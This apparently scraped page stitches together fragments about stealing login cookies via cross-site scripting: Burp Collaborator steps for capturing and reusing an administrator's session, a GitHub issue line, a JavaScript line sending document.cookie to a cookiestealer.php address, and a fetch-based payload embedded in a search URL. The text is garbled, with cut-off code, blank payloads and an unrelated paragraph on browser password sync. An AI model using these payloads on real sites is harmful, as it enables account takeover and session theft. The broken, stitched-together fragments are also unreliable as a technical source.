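The URL inside fetch is the payload generated by Burp Collaborator Client. Next, open Burp Collaborator Client and you will see an HTTP message. Open it; it contains the administrator's session. Then use this cookie to overwrite the cookie on the home page, and the job is done.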
Then fill in the payload " " in the ad content. Open the Invocation tab and copy the invocation link. Access the link; this causes XSS that steals sensitive information of logged-in users. weng-xianhu closed this as completed Mar 22, 2024
The JavaScript string we'll use to pass cookies to a server where we can write them will once again use the document.cookie property; this time, however, it is passed inline in a URL assigned to document.location. document.location='http://127.0.0.1/cookiestealer.php?c='+...
Payload response.json()).then(data => console.log(data)).catch(error => console.error('Error:', error));"> Payload integrated URL (cookie is stolen through an XSS-vulnerable site) https://www.yoursite.com/search?term= response.json()).then(data => console.log(data)).catch(error...
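Moreover, most modern browsers have a cloud sync mechanism: besides bookmarks and personal preferences, it can also sync the passwords the browser has remembered, so users can sync their "habits" from anywhere. Some authentication cookies are bound to an IP address, in which case syncing cookies does not work. In short, passwords are convenient but heavily overused, and overuse carries risk; add cloud sync on top of that, and hackers get excited.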